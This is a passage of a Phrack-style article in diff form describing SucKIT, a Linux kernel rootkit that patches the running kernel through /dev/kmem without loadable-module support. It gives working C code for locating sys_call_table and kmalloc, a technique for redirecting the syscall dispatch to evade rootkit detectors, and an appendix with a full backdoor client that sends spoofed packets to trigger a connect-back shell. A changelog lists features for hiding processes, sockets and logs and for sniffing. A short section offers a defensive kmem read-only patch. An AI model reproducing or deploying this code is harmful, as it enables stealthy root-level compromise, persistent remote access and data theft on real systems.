+i.e. it is simply "imported" by /sbin/insmod
+[ using create_module() / init_module() ]
+
+Uhh, let's stop talking about nothing, we think this is clear enough for
+everybody.
+
+
+--[ 3.1 - How to get sys_call_table[] without LKM
+
+  At first, note that the Linux kernel _doesn not keep_ any kinda of
+information about it's symbols in case when there is no LKM support
+compiled in. It is rather a clever decision because why could someone need
+it without LKM ? For debugging ? You have System.map instead. Well WE need
+it :) With LKM support there are symbols intended to be imported into LKMs
+(in their special linker section), but we said without LKM, right ?
+
+As far we know, the most elegant way how to obtain sys_call_table[] is:
+
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+
+struct {
+        unsigned short limit;
+        unsigned int base;
+} __attribute__ ((packed)) idtr;
+
+struct {
+        unsigned short off1;
+        unsigned short sel;
+        unsigned char none,flags;
+        unsigned short off2;
+} __attribute__ ((packed)) idt;
+
+int kmem;
+void readkmem (void *m,unsigned off,int sz)
+{
+        if (lseek(kmem,off,SEEK_SET)!=off) {
+                perror("kmem lseek"); exit(2);
+        }
+        if (read(kmem,m,sz)!=sz) {
+                perror("kmem read"); exit(2);
+        }
+}
+
+#define CALLOFF 100     /* we'll read first 100 bytes of int $0x80*/
+main ()
+{
+        unsigned sys_call_off;
+        unsigned sct;
+        char sc_asm[CALLOFF],*p;
+
+        /* well let's read IDTR */
+        asm ("sidt %0" : "=m" (idtr));
+        printf("idtr base at 0x%X\n",(int)idtr.base);
+
+        /* now we will open kmem */
+        kmem = open ("/dev/kmem",O_RDONLY);
+        if (kmem<0) return 1;
+
+        /* read-in IDT for 0x80 vector (syscall) */
+        readkmem (&idt,idtr.base+8*0x80,sizeof(idt));
+        sys_call_off = (idt.off2 << 16) | idt.off1;
+        printf("idt80: flags=%X sel=%X off=%X\n",
+                (unsigned)idt.flags,(unsigned)idt.sel,sys_call_off);
+
+        /* we have syscall routine address now, look for syscall table
+           dispatch (indirect call) */
+        readkmem (sc_asm,sys_call_off,CALLOFF);
+        p = (char*)memmem (sc_asm,CALLOFF,"\xff\x14\x85",3);
+        sct = *(unsigned*)(p+3);
+        if (p) {
+                printf ("sys_call_table at 0x%x, call dispatch at 0x%x\n",
+                        sct, p);
+        }
+        close(kmem);
+}
+
+How it works ? The sidt instruction "asks the processor" for the interrupt
+descriptor table [asm ("sidt %0" : "=m" (idtr));], from
+this structure we will get a pointer to the interrupt descriptor of
+int $0x80 [readkmem (&idt,idtr.base+8*0x80,sizeof(idt));].
+
+>From the IDT we can compute the address of int $0x80's entrypoint
+[sys_call_off = (idt.off2 << 16) | idt.off1;]
+Good, we know where int $0x80 began, but that is not our loved
+sys_call_table[]. Let's take a look at the int $0x80 entrypoint:
+
+[sd@pikatchu linux]$ gdb -q /usr/src/linux/vmlinux
+(no debugging symbols found)...(gdb) disass system_call
+Dump of assembler code for function system_call:
+0xc0106bc8 <system_call>:       push   %eax
+0xc0106bc9 <system_call+1>:     cld
+0xc0106bca <system_call+2>:     push   %es
+0xc0106bcb <system_call+3>:     push   %ds
+0xc0106bcc <system_call+4>:     push   %eax
+0xc0106bcd <system_call+5>:     push   %ebp
+0xc0106bce <system_call+6>:     push   %edi
+0xc0106bcf <system_call+7>:     push   %esi
+0xc0106bd0 <system_call+8>:     push   %edx
+0xc0106bd1 <system_call+9>:     push   %ecx
+0xc0106bd2 <system_call+10>:    push   %ebx
+0xc0106bd3 <system_call+11>:    mov    $0x18,%edx
+0xc0106bd8 <system_call+16>:    mov    %edx,%ds
+0xc0106bda <system_call+18>:    mov    %edx,%es
+0xc0106bdc <system_call+20>:    mov    $0xffffe000,%ebx
+0xc0106be1 <system_call+25>:    and    %esp,%ebx
+0xc0106be3 <system_call+27>:    cmp    $0x100,%eax
+0xc0106be8 <system_call+32>:    jae    0xc0106c75 <badsys>
+0xc0106bee <system_call+38>:    testb  $0x2,0x18(%ebx)
+0xc0106bf2 <system_call+42>:    jne    0xc0106c48 <tracesys>
+0xc0106bf4 <system_call+44>:    call   *0xc01e0f18(,%eax,4) <-- that's it
+0xc0106bfb <system_call+51>:    mov    %eax,0x18(%esp,1)
+0xc0106bff <system_call+55>:    nop
+End of assembler dump.
+(gdb) print &sys_call_table
+$1 = (<data variable, no debug info> *) 0xc01e0f18      <-- see ? it's same
+(gdb) x/xw (system_call+44)
+0xc0106bf4 <system_call+44>:    0x188514ff <-- opcode (little endian)
+(gdb)
+
+  In short, near to beginning of int $0x80 entrypoint is
+'call sys_call_table(,eax,4)' opcode, because this indirect call does not
+vary between kernel versions (it is same on 2.0.10 => 2.4.10), it's
+relatively safe to search just for pattern of 'call <something>(,eax,4)'
+
+opcode = 0xff 0x14 0x85 0x<address_of_table>
+
+[memmem (sc_asm,CALLOFF,"\xff\x14\x85",3);]
+
+  Being paranoid, one could do a more robust hack. Simply redirect whole
+int $0x80 handler in IDT to our fake handler and intercept interesting
+calls here. It is a bit more complicated as we would have to handle
+reentrancy ...
+
+  At this time, we know where sys_call_table[] is and we can change the
+address of some syscalls:
+
+Pseudocode:
+        readkmem(&old_write, sct + __NR_write * 4, 4); /* save old */
+        writekmem(new_write, sct + __NR_write * 4, 4); /* set new */
+
+
+--[ 3.2 - Redirecting int $0x80 call sys_call_table[eax] dispatch
+
+  When writing this article, we found some "rootkit detectors"
+on Packetstorm/Freshmeat. They are able to detect the fact that
+something is wrong with a LKM/syscalltable/other kernel
+stuff...fortunately, most of them are too stupid and can be simply
+fooled by the the trick introduced in [6] by SpaceWalker:
+
+Pseudocode:
+        ulong sct = addr of sys_call_table[]
+        char *p = ptr to int 0x80's call sct(,eax,4) - dispatch
+        ulong nsct[256] = new syscall table with modified entries
+
+        readkmem(nsct, sct, 1024);      /* read old */
+        old_write = nsct[__NR_write];
+        nsct[__NR_write] = new_write;
+        /* replace dispatch to our new sct */
+        writekmem((ulong) p+3, nsct, 4);
+
+        /* Note that this code never can work, because you can't
+           redirect something kernel related to userspace, such as
+           sct[] in this case */
+
+Background:
+  We create a copy of the original sys_call_table[] [readkmem(nsct, sct,
+1024);], then we will modify entries which we're interested in [old_write =
+nsct[__NR_write]; nsct[__NR_write] = new_write;] and then change _only_
+addr of <something> in the call <something>(,eax,4):
+
+0xc0106bf4 <system_call+44>:    call   *0xc01e0f18(,%eax,4)
+                                        ~~~~|~~~~~
+                                            |__ Here will be address of
+                                                _our_ sct[]
+
+LKM detectors (which does not check consistency of int $0x80) won't see
+anything, sys_call_table[] is the same, but int $0x80 uses our implanted
+table.
+
+
+--[ 4 - Allocating kernel space without help of LKM support
+  Next thing that we need is a memory page above the 0xc0000000
+(or 0x80000000) address.
+The 0xc0000000 value is demarcation point between user and kernel memory.
+User processes have not access above the limit. Take into account
+that this value is not exact, and may be different, so it is good idea
+to figure out the limit on the fly (from int $0x80's entrypoint).
+Well, how to get our page above the limit ? Let's take a look how regular
+kernel LKM support does it (/usr/src/linux/kernel/module.c):
+
+...
+void inter_module_register(const char *im_name, struct module *owner,
+                           const void *userdata)
+{
+        struct list_head *tmp;
+        struct inter_module_entry *ime, *ime_new;
+
+        if (!(ime_new = kmalloc(sizeof(*ime), GFP_KERNEL))) {
+                /* Overloaded kernel, not fatal */
+        ...
+
+As we expected, they used kmalloc(size, GFP_KERNEL) ! But we can't use
+kmalloc() yet because:
+
+        - We don't know the address of kmalloc() [ paragraph 4.1, 4.2 ]
+        - We don't know the value of GFP_KERNEL [ paragraph 4.3 ]
+        - We can't call kmalloc() from user-space [ paragraph 4.4 ]
+
+
+--[ 4.1 - Searching for kmalloc() using LKM support
+
+If we can use LKM support:
+
+/* kmalloc() lookup */
+
+/* simplest & safest way, but only if LKM support is there */
+ulong   get_sym(char *n) {
+        struct  kernel_sym      tab[MAX_SYMS];
+        int     numsyms;
+        int     i;
+
+        numsyms = get_kernel_syms(NULL);
+        if (numsyms > MAX_SYMS || numsyms < 0) return 0;
+        get_kernel_syms(tab);
+        for (i = 0; i < numsyms; i++) {
+                if (!strncmp(n, tab[i].name, strlen(n)))
+                        return tab[i].value;
+        }
+        return 0;
+}
+
+ulong   get_kma(ulong pgoff)
+{
+        ret = get_sym("kmalloc");
+        if (ret) return ret;
+        return 0;
+}
+
+We leave this without comments.
+
+
+--[ 4.2 - pattern search of kmalloc()
+
+  But if LKM is not there, were getting into troubles. The solution
+is quite dirty, and not-so-good by the way, but it seem to work.
+We'll walk through kernel's .text section and look for patterns such as:
+
+        push    GFP_KERNEL <something between 0-0xffff>
+        push    size       <something between 0-0x1ffff>
+        call    kmalloc
+
+All info will be gathered into a table, sorted and the function called most
+times will be our kmalloc(), here is code:
+
+/* kmalloc() lookup */
+#define RNUM 1024
+ulong   get_kma(ulong pgoff)
+{
+        struct { uint a,f,cnt; } rtab[RNUM], *t;
+        uint            i, a, j, push1, push2;
+        uint            found = 0, total = 0;
+        uchar           buf[0x10010], *p;
+        int             kmem;
+        ulong           ret;
+
+        /* uhh, before we try to brute something, attempt to do things
+           in the *right* way ;)) */
+        ret = get_sym("kmalloc");
+        if (ret) return ret;
+
+        /* humm, no way ;)) */
+        kmem = open(KMEM_FILE, O_RDONLY, 0);
+        if (kmem < 0) return 0;
+        for (i = (pgoff + 0x100000); i < (pgoff + 0x1000000);
+             i += 0x10000) {
+                if (!loc_rkm(kmem, buf, i, sizeof(buf))) return 0;
+                /* loop over memory block looking for push and calls */
+                for (p = buf; p < buf + 0x10000;) {
+                        switch (*p++) {
+                                case 0x68:
+                                        push1 = push2;
+                                        push2 = *(unsigned*)p;
+                                        p += 4;
+                                        continue;
+                                case 0x6a:
+                                        push1 = push2;
+                                        push2 = *p++;
+                                        continue;
+                                case 0xe8:
+                                        if (push1 && push2 &&
+                                            push1 <= 0xffff &&
+                                            push2 <= 0x1ffff) break;
+                                default:
+                                        push1 = push2 = 0;
+                                        continue;
+                        }
+                        /* we have push1/push2/call seq; get address */
+                        a = *(unsigned *) p + i + (p - buf) + 4;
+                        p += 4;
+                        total++;
+                        /* find in table */
+                        for (j = 0, t = rtab; j < found; j++, t++)
+                                if (t->a == a && t->f == push1) break;
+                        if (j < found)
+                                t->cnt++;
+                        else
+                                if (found >= RNUM) {
+                                        return 0;
+                                }
+                                else {
+                                        found++;
+                                        t->a = a;
+                                        t->f = push1;
+                                        t->cnt = 1;
+                                }
+                        push1 = push2 = 0;
+                } /* for (p = buf; ... */
+        } /* for (i = (pgoff + 0x100000) ...*/
+        close(kmem);
+        t = NULL;
+        for (j = 0;j < found; j++)  /* find a winner */
+                if (!t || rtab[j].cnt > t->cnt) t = rtab+j;
+        if (t) return t->a;
+        return 0;
+}
+
+The code above is a simple state machine and it doesn't bother itself with
+potentionaly different asm code layout (when you use some exotic GCC
+options). It could be extended to understand different code patterns (see
+switch statement) and can be made more accurate by checking GFP value in
+PUSHes against known patterns (see paragraph bellow).
+
+The accuracy of this code is about 80% (i.e. 80% points to kmalloc, 20% to
+some junk) and seem to work on 2.2.1 => 2.4.13 ok.
+
+--[ 4.3 The GFP_KERNEL value
+
+  Next problem we get while using kmalloc() is the fact that value of
+GFP_KERNEL varies between kernel series, but we can get rid of it
+by help of uname()
+
++-----------------------------------+
+| kernel version | GFP_KERNEL value |
++----------------+------------------+
+| 1.0.x .. 2.4.5 |     0x3          |
++----------------+------------------+
+| 2.4.6 .. 2.4.x |     0x1f0        |
++----------------+------------------+
+
+Note that there is some troubles with 2.4.7-2.4.9 kernels, which
+sometimes crashes due to bad GFP_KERNEL, simply because
+the table above is not exact, it only shows values we CAN use.
+
+The code:
+
+#define NEW_GFP         0x1f0
+#define OLD_GFP         0x3
+
+/* uname struc */
+struct un {
+        char    sysname[65];
+        char    nodename[65];
+        char    release[65];
+        char    version[65];
+        char    machine[65];
+        char    domainname[65];
+};
+
+int     get_gfp()
+{
+        struct un s;
+        uname(&s);
+        if ((s.release[0] == '2') && (s.release[2] == '4') &&
+            (s.release[4] >= '6' ||
+            (s.release[5] >= '0' && s.release[5] <= '9'))) {
+                return NEW_GFP;
+        }
+        return OLD_GFP;
+}
+
+
+--[ 4.3 - Overwriting a syscall
+
+  As we mentioned above, we can't call kmalloc() from user-space directly,
+solution is Silvio's trick [2] of replacing syscall:
+
+        1. Get address of some syscall
+           (IDT -> int 0x80 -> sys_call_table)
+        2. Create a small routine which will call kmalloc() and return
+           pointer to allocated page
+        3. Save sizeof(our_routine) bytes of some syscall
+        4. Overwrite code of some syscall by our routine
+        5. Call this syscall from userspace thru int $0x80, so
+           our routine will operate in kernel context and
+           can call kmalloc() for us passing out the
+           address of allocated memory as return value.
+        6. Restore code of some syscall with saved bytes (in step 3.)
+
+our_routine may look as something like that:
+
+struct  kma_struc {
+        ulong   (*kmalloc) (uint, int);
+        int     size;
+        int     flags;
+        ulong   mem;
+} __attribute__ ((packed));
+
+int     our_routine(struct kma_struc *k)
+{
+        k->mem = k->kmalloc(k->size, k->flags);
+        return 0;
+}
+
+In this case we directly pass needed info to our routine.
+
+Now we have kernel memory, so we can copy our handling routines
+there, point entries in fake sys_call_table to them, infiltrate
+this fake table into int $0x80 and enjoy the ride :)
+
+--[ 5 - What you should take care of
+
+It would be good idea to follow these rules when writing something using
+this technique:
+
+        -  Take care of kernel versions (We mean GFP_KERNEL).
+        -  Play _only_ with syscalls, _do not_ use any internal kernel
+           structures including task_struct, if you want to stay portable
+           between kernel series.
+        -  SMP may cause some troubles, remember to take care
+           about reentrantcy and where it is needed, use
+           user-space locks [ src/core.c#ualloc() ]
+
+
+--[ 6 - Possible solutions
+
+  Okay, now from the good man's point of view. You probably would
+like to defeat attacks of kids using such annoying toys. Then you
+should apply following kmem read-only patch and disable LKM
+support in your kernel.
+
+<++> kmem-ro.diff
+--- /usr/src/linux/drivers/char/mem.c   Mon Apr  9 13:19:05 2001
++++ /usr/src/linux/drivers/char/mem.c   Sun Nov  4 15:50:27 2001
+@@ -49,6 +51,8 @@
+ const char * buf, size_t count, loff_t *ppos)
+ {
+	ssize_t written;
++       /* disable kmem write */
++       return -EPERM;
+
+  written = 0;
+  #if defined(__sparc__) || defined(__mc68000__)
+<-->
+
+Note that this patch can be source of troubles in conjuction with
+some old utilities which depends on /dev/kmem writing ability.
+That's payment for security.
+
+--[ 7 - Conclusion
+
+  The raw memory I/O devices in linux seems to be pretty powerful.
+Attackers (of course, with root privileges) can use them
+to hide their actions, steal informations, grant remote access and so on
+for a long time without being noticed. As far we know, there is not so
+big use of these devices (in the meaning of write access), so it may be
+good idea to disable their writing ability.
+
+--[ 8 - References
+
+ [1] Silvio Cesare's homepage, pretty good info about low-level linux stuff
+     [http://www.big.net.au/~silvio]
+
+ [2] Silvio's article describing run-time kernel patching (System.map)
+     [http://www.big.net.au/~silvio/runtime-kernel-kmem-patching.txt]
+
+ [3] QuantumG's homepage, mostly virus related stuff
+     [http://biodome.org/~qg]
+
+ [4] "Abuse of the Linux Kernel for Fun and Profit" by halflife
+     [Phrack issue 50, article 05]
+
+ [5] "(nearly) Complete Linux Loadable Kernel Modules. The definitive guide
+      for hackers, virus coders and system administrators."
+     [http://www.thehackerschoice.com/papers]
+
+  At the end, I (sd) would like to thank to devik for helping me a lot with
+this crap, to Reaction for common spelling checks and to anonymous
+editor's friend which proved the quality of article a lot.
+
+--[ 9 - Appendix - SucKIT: The implementation
+
+I'm sure that you are smart enough, so you know how to extract, install and
+use these files.
+
+[MORONS HINT: Try Phrack extraction utility, ./doc/README]
+
+ATTENTION: This is a full-working rootkit as an example of the technique
+           described above, the author doesn't take ANY RESPONSIBILITY for
+           any damage caused by (mis)use of this software.
+
+<++> ./client/Makefile
+client: client.c
+	$(CC) $(CFLAGS) -I../include client.c -o client
+clean:
+	rm -f client core
+<--> ./client/Makefile
+<++> ./client/client.c
+/* $Id: client.c, TTY client for our backdoor, see src/bd.c */
+
+#include <sys/wait.h>
+#include <sys/types.h>
+#include <sys/resource.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <string.h>
+#include <fcntl.h>
+
+#include <netinet/tcp.h>
+#include <netinet/ip.h>
+#include <netinet/in.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <net/if.h>
+
+#include <netdb.h>
+#include <arpa/inet.h>
+#include <termios.h>
+#include <errno.h>
+#include <string.h>
+
+#define DEST_PORT       80
+
+/* retry timeout, 15 secs works fine,
+   try lower values on slower networks */
+#define RETRY           15
+
+#include "ip.h"
+
+int     winsize;
+
+char    *envtab[] =
+{
+        "",
+        "",
+        "LOGNAME=shitdown",
+        "USERNAME=shitdown",
+        "USER=shitdown",
+        "PS1=[rewt@\\h \\W]\\$ ",
+        "HISTFILE=/dev/null",
+        "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:"
+        "/usr/local/sbin:/usr/X11R6/bin:./bin",
+        "!TERM",
+        NULL
+};
+
+int     sendenv(int sock)
+{
+        struct  winsize ws;
+#define ENVLEN  256
+        char    envbuf[ENVLEN+1];
+        char    buf1[256];
+        char    buf2[256];
+        int     i = 0;
+
+        ioctl(0, TIOCGWINSZ, &ws);
+        sprintf(buf1, "COLUMNS=%d", ws.ws_col);
+        sprintf(buf2, "LINES=%d", ws.ws_row);
+        envtab[0] = buf1; envtab[1] = buf2;
+
+        while (envtab[i]) {
+                bzero(envbuf, ENVLEN);
+                if (envtab[i][0] == '!') {
+                        char *env;
+                        env = getenv(&envtab[i][1]);
+                        if (!env) goto oops;
+                        sprintf(envbuf, "%s=%s", &envtab[i][1], env);
+                } else {
+                        strncpy(envbuf, envtab[i], ENVLEN);
+                }
+                if (write(sock, envbuf, ENVLEN) < ENVLEN) return 0;
+oops:
+                i++;
+        }
+        return write(sock, "\n", 1);
+}
+
+void    winch(int i)
+{
+        signal(SIGWINCH, winch);
+        winsize++;
+}
+
+void    sig_child(int i)
+{
+        waitpid(-1, NULL, WNOHANG);
+}
+
+int     usage(char *s)
+{
+        printf(
+                "Usage:\n"
+                "\t%s <host> [source_addr] [source_port]\n\n"
+                ,s);
+        return 1;
+}
+
+ulong   resolve(char *s)
+{
+        struct  hostent *he;
+        struct  sockaddr_in si;
+        /* resolve host */
+        bzero((char *) &si, sizeof(si));
+        si.sin_addr.s_addr = inet_addr(s);
+        if (si.sin_addr.s_addr == INADDR_NONE) {
+                printf("Looking up %s...", s); fflush(stdout);
+                he = gethostbyname(s);
+                if (!he) {
+                        printf("Failed!\n");
+                        return INADDR_NONE;
+                }
+                memcpy((char *) &si.sin_addr, (char *) he->h_addr,
+                       sizeof(si.sin_addr));
+                printf("OK\n");
+        }
+        return si.sin_addr.s_addr;
+}
+
+int     raw_send(struct rawdata *d, ulong tfrom, ushort sport, ulong to,
+                 ushort dport)
+{
+        int                     raw_sock;
+        int                     hincl = 1;
+        struct  sockaddr_in     from;
+        struct  ippkt           packet;
+        struct  pseudohdr       psd;
+        int     err;
+
+        char                    tosum[sizeof(psd) + sizeof(packet.tcp)];
+
+        raw_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
+        if (raw_sock < 0) {
+                perror("socket");
+                return 0;
+        }
+        if (setsockopt(raw_sock, IPPROTO_IP,
+            IP_HDRINCL, &hincl, sizeof(hincl)) < 0) {
+                perror("socket");
+                close(raw_sock);
+                return 0;
+        }
+        bzero((char *) &packet, sizeof(packet));
+        from.sin_addr.s_addr = to;
+        from.sin_family = AF_INET;
+
+        /* setup IP header */
+        packet.ip.ip_len = sizeof(struct ip) +
+                           sizeof(struct tcphdr) + 12 +
+                           sizeof(struct rawdata);
+        packet.ip.ip_hl = sizeof(packet.ip) >> 2;
+        packet.ip.ip_v = 4;
+        packet.ip.ip_ttl = 255;
+        packet.ip.ip_tos = 0;
+        packet.ip.ip_off = 0;
+        packet.ip.ip_id = htons((int) rand());
+        packet.ip.ip_p = 6;
+        packet.ip.ip_src.s_addr = tfrom; /* www.microsoft.com :) */
+        packet.ip.ip_dst.s_addr = to;
+        packet.ip.ip_sum = in_chksum((u_short *) &packet.ip,
+                                     sizeof(struct ip));
+
+        /* tcp header */
+        packet.tcp.source = sport;
+        packet.tcp.dest = dport;
+        packet.tcp.seq = 666;
+        packet.tcp.ack = 0;
+        packet.tcp.urg = 0;
+        packet.tcp.window = 1234;
+        packet.tcp.urg_ptr = 1234;
+        memcpy(packet.data, (char *) d, sizeof(struct rawdata));
+
+        /* pseudoheader */
+        memcpy(&psd.saddr, &packet.ip.ip_src.s_addr, 4);
+        memcpy(&psd.daddr, &packet.ip.ip_dst.s_addr, 4);
+        psd.protocol = 6;
+        psd.lenght = htons(sizeof(struct tcphdr) + 12 +
+                           sizeof(struct rawdata));
+        memcpy(tosum, &psd, sizeof(psd));
+        memcpy(tosum + sizeof(psd), &packet.tcp, sizeof(packet.tcp));
+        packet.tcp.check = in_chksum((u_short *) &tosum, sizeof(tosum));
+
+        /* send that fuckin' stuff */
+        err = sendto(raw_sock, &packet, sizeof(struct ip) +
+                              sizeof(struct iphdr) + 12 +
+                              sizeof(struct rawdata),
+                              0, (struct sockaddr *) &from,
+                              sizeof(struct sockaddr));
+        if (err < 0) {
+                perror("sendto");
+                close(raw_sock);
+                return 0;
+        }
+        close(raw_sock);
+        return 1;
+}
+
+#define BUF     16384
+int     main(int argc, char *argv[])
+{
+        ulong   serv;
+        ulong   saddr;
+        ushort  sport = htons(80);
+        char    hostname[1024];
+        struct  rawdata         data;
+
+        int     sock;
+        int     pid;
+        struct  sockaddr_in     peer;
+        struct  sockaddr_in     srv;
+        int     slen = sizeof(srv);
+        int     ss;
+
+
+        char    pwd[256];
+        int     i;
+        struct  termios old, new;
+        unsigned char   buf[BUF];
+        fd_set          fds;
+        struct  winsize ws;
+
+        /* input checks */
+        if (argc < 2) return usage(argv[0]);
+        serv = resolve(argv[1]);
+        if (!serv) return 1;
+
+        if (argc >= 3) {
+                saddr = resolve(argv[2]);
+                if (!saddr) return 1;
+        } else {
+                if (gethostname(hostname, sizeof(hostname)) < 0) {
+                        perror("gethostname");
+                        return 1;
+                }
+                saddr = resolve(hostname);
+                if (!saddr) return 1;
+        }
+        if (argc == 4) {
+                int     i;
+                if (sscanf(argv[3], "%u", &i) != 1)
+                        return usage(argv[0]);
+                sport = htons(i);
+        }
+
+        peer.sin_addr.s_addr = serv;
+        printf("Trying %s...", inet_ntoa(peer.sin_addr)); fflush(stdout);
+        sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+        if (sock < 0) {
+                perror("socket");
+                return 1;
+        }
+        bzero((char *) &peer, sizeof(peer));
+
+        peer.sin_family = AF_INET;
+        peer.sin_addr.s_addr = htonl(INADDR_ANY);
+        peer.sin_port = 0;
+
+        if (bind(sock, (struct sockaddr *) &peer, sizeof(peer)) < 0) {
+                perror("bind");
+                return 1;
+        }
+
+        if (listen(sock, 1) < 0) {
+                perror("listen");
+                return 1;
+        }
+
+        pid = fork();
+        if (pid < 0) {
+                perror("fork");
+                return 1;
+        }
+
+        /* child ? */
+        if (pid == 0) {
+                int     plen = sizeof(peer);
+                if (getsockname(sock, (struct sockaddr *) &peer,
+                    &plen) < 0) {
+                        exit(0);
+                }
+                data.ip = saddr;
+                data.port = peer.sin_port;
+                data.id = RAWID;
+                while (1) {
+                        int     i;
+                        if (!raw_send(&data, saddr, sport, serv,
+                            htons(DEST_PORT))) {
+                                exit(0);
+                        }
+                        for (i = 0; i < RETRY; i++) {
+                                printf("."); fflush(stdout);
+                                sleep(1);
+                        }
+                }
+        }
+
+        signal(SIGCHLD, sig_child);
+        ss = accept(sock, (struct sockaddr *) &srv, &slen);
+        if (ss < 0) {
+                perror("Network error");
+                kill(pid, SIGKILL);
+                exit(1);
+        }
+        kill(pid, SIGKILL);
+        close(sock);
+        printf("\nChallenging %s\n", argv[1]);
+
+        /* set-up terminal */
+        tcgetattr(0, &old);
+        new = old;
+        new.c_lflag &= ~(ICANON | ECHO | ISIG);
+        new.c_iflag &= ~(IXON | IXOFF);
+        tcsetattr(0, TCSAFLUSH, &new);
+
+        printf(
+                "Connected to %s.\n"
+                "Escape character is '^K'\n", argv[1]);
+
+        printf("Password:"); fflush(stdout);
+        bzero(pwd, sizeof(pwd));
+        i = 0;
+        while (1) {
+                if (read(0, &pwd[i], 1) <= 0) break;
+                if (pwd[i] == ECHAR) {
+                        printf("Interrupted!\n");
+                        tcsetattr(0, TCSAFLUSH, &old);
+                        return 0;
+                }
+                if (pwd[i] == '\n') break;
+                i++;
+        }
+        pwd[i] = 0;
+        write(ss, pwd, sizeof(pwd));
+        printf("\n");
+        if (sendenv(ss) <= 0) {
+                perror("Failed");
+                tcsetattr(0, TCSAFLUSH, &old);
+                return 1;
+        }
+
+        /* everything seems to be OK, so let's go ;) */
+        winch(0);
+        while (1) {
+                FD_ZERO(&fds);
+                FD_SET(0, &fds);
+                FD_SET(ss, &fds);
+
+                if (winsize) {
+                        if (ioctl(0, TIOCGWINSZ, &ws) == 0) {
+                                buf[0] = ECHAR;
+                                buf[1] = (ws.ws_col >> 8) & 0xFF;
+                                buf[2] = ws.ws_col & 0xFF;
+                                buf[3] = (ws.ws_row >> 8) & 0xFF;
+                                buf[4] = ws.ws_row & 0xFF;
+                                write(ss, buf, 5);
+                        }
+                        winsize = 0;
+                }
+
+                if (select(ss+1, &fds, NULL, NULL, NULL) < 0) {
+                        if (errno == EINTR) continue;
+                        break;
+                }
+                if (winsize) continue;
+                if (FD_ISSET(0, &fds)) {
+                        int     count = read(0, buf, BUF);
+//                      int     i;
+                        if (count <= 0) break;
+                        if (memchr(buf, ECHAR, count)) {
+                                printf("Interrupted!\n");
+                                break;
+                        }
+                        if (write(ss, buf, count) <= 0) break;
+                }
+                if (FD_ISSET(ss, &fds)) {
+                        int     count = read(ss, buf, BUF);
+                        if (count <= 0) break;
+                        if (write(0, buf, count) <= 0) break;
+                }
+        }
+        close(sock);
+        tcsetattr(0, TCSAFLUSH, &old);
+        printf("\nConnection closed.\n");
+        return 0;
+}
+<--> ./client/client.c
+<++> ./doc/LICENSE
+* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
+* SUCKIT v1.1c - New, singing, dancing, world-smashing rewtkit  *
+* (c)oded by sd@sf.cz & devik@cdi.cz, 2001                      *
+* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
+
+This program is free software; you can redistribute it and/or modify
+it under the terms of the GNU General Public License as published by
+the Free Software Foundation; either version 2 of the License, or
+(at your option) any later version.
+
+This program is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU General Public License for more details.
+<--> ./doc/LICENSE
+<++> ./doc/CHANGES
+Development history:
+Version 1.1c:
+        - disabled flow control in client, escape char changed to ^K
+Version 1.1b:
+        - fixed GFP_KERNEL bug with segfaulting on 2.4.0 - 2.4.5 kernels
+Version 1.1a:
+        - makefile, added SIGWINCH support + autentification of remote
+          user (but still in plain text ;( )
+Version 1.0d:
+        - added connect-back bindshell, with TTY/PTY support !
+          filtering out invisible pids, connections and philes ;)
+Version 1.0c:
+        - only one thing we're doing at this time, is to change one letter
+          in output of uname()
+Version 1.0b:
+        - first working version of new code, relocations made directly
+          from .o, as far i know, everything works on 2.4.x smoothly,
+          just add some good old features...
+          Added (read: stolen) linus' string.c and vsprintf.c in order to
+          make coding more user-phriendly ;)
+Version 1.0a:
+        - devik@cdi.cz discovered that `sidt` works on linux ... so we can
+          play a bit with int 0x80 ;)) kmalloc search engine was written by
+          devik too, many thanks to him!
+---------------------------------------------------------------------------
+Version 0.3d:
+        - I got 2.4.10 kernel and things are _totally_ fucked up,
+          nothing didn't work, kmalloc search engine was gone and so on ..
+          So i decided to rewrite code from scratch,
+          divide it to more files.
+Version 0.3c: (PUBLIC)
+        - added getdents64 (interesting for 2.4.x kernel, but compatibility
+          still not guaranted)
+Version 0.3b:
+        - added `scp` sniffing
+        - no sniffing of hidden users anymore!
+Version 0.3: (PUBLIC)
+        - Punk. Fool. We don't need LKM support anymore !!!
+          We're able to heuristically abtain (with 80% accuracy ;)
+          sys_call_table[] and kmalloc() directly from /dev/kmem !!!
+          third release under GNU/GPL
+Version 0.23a:
+        - completely rewritten new_getdents(), fixed major bugs,
+          but still sometimes crashes unpredictabely ;-(
+Version 0.22b:
+        - rcscript is executed as invisible by nature ;)
+Version 0.22a:
+        - Fixed "unhide all" bug, feature works now
+Version 0.21a:
+        - added ssh2d support
+Version 0.2a:
+        - fixed ugly bug in that suckit forgets to hide some invisible
+          pids (on high loads) without reason !!
+          (thx. to root@buggy.frogspace.net ;)
+Version 0.2: (PUBLIC)
+        - Cleanup (the suckit.h thing, etc),
+          l33t bash skripts (flares, mk, inst),
+          second (BUGFIX) release under GNU/GPL
+Version 0.13a:
+        - Filters out the syslogd's lines of us while we logginin' in/out,
+          WE'RE TOTALLY INVISIBLE NOW!
+Version 0.12a:
+        - Finally! We're able to hide our TCP/UDP/RAW sockets in netstat!
+          Everything done usin' stealth techniqe for /proc/net/tcp|udp|raw
+Version 0.11b:
+        - We hide the fact that someone sets PROMISC flag on some eth iface
+          (thru ioctl)
+Version 0.11a:
+        - Fixed the weird bug in check_names() so we're able to stay in
+          kernel for more than 2 hours without consuming a lotta of memory
+          and rebooting (thx. to root@host2.dns4ua.com)
+Version 0.1: (PUBLIC):
+        - General code cleanup, released first version under GNU/GPL
+Version 0.08a:
+        - Added suid=0 fakeshell thing, because some hosts don't like uid=0
+          users remotely logged in ;)
+Version 0.07c:
+        - Fixed bug with kernel's symbol versions (strncmp ownz! ;) while
+          we importin' symbols
+Version 0.07b:
+        - Added the `config` crap ;)
+Version 0.07a:
+        - Everything joined into one executable ;)
+          Compilation divided into three parts:
